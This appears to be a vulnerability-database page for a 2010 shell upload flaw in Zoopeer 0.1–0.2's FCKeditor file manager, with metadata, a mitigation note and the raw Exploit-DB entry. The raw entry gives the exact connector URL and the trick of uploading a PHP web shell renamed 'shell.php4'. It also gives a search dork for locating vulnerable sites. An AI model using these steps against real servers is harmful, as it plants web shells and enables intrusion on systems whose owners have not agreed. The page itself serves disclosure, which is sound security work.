Zoopeer 0.1 & 0.2 (fckeditor) Zoopeer Shell Upload Vulnerability

vendor:

Zoopeer

by:

Net.Edit0r

7,5

CVSS

HIGH

Shell Upload Vulnerability

434

CWE

Product Name: Zoopeer

Affected Version From: 0.1

Affected Version To: 0.2

Patch Exists: NO

Related CWE: N/A

CPE: a:zoopeer:zoopeer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux Ubuntu 9.04

2010

Zoopeer 0.1 & 0.2 (fckeditor) Zoopeer Shell Upload Vulnerability

Zoopeer 0.1 & 0.2 (fckeditor) is vulnerable to a shell upload vulnerability. An attacker can exploit this vulnerability by navigating to the fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php page and selecting a PHP file renamed via the php4 (shell.php4) extension. This will allow the attacker to upload a malicious file to the server.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate extensions and that the application is configured to only allow the upload of files with the appropriate content.

Source

Exploit-DB raw data:

=============================================================
Zoopeer 0.1 & 0.2 (fckeditor) Zoopeer Shell Upload Vulnerability
=============================================================
###################################################
#
# Exploit Title: Zoopeer 0.1 & 0.2 (fckeditor)
# Date: 27-10-2010
# Author: Net.Edit0r
# Software Link: http://www.zoopeer.com/
# Version: 0.1 & 0.2
# Tested on: Linux Ubuntu 9.04
# dork : "Powered By Zoopeer"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
#
####################################################

    exploit # fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php


first go to # http://site.com/fck


       then # http://site.com/fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

     select # Php renamed via the php4 (shell.php4)

Video : http://net-edit0r.persiangig.com/Film/fck.rar

#######################################################

Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , Zalatan
       BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic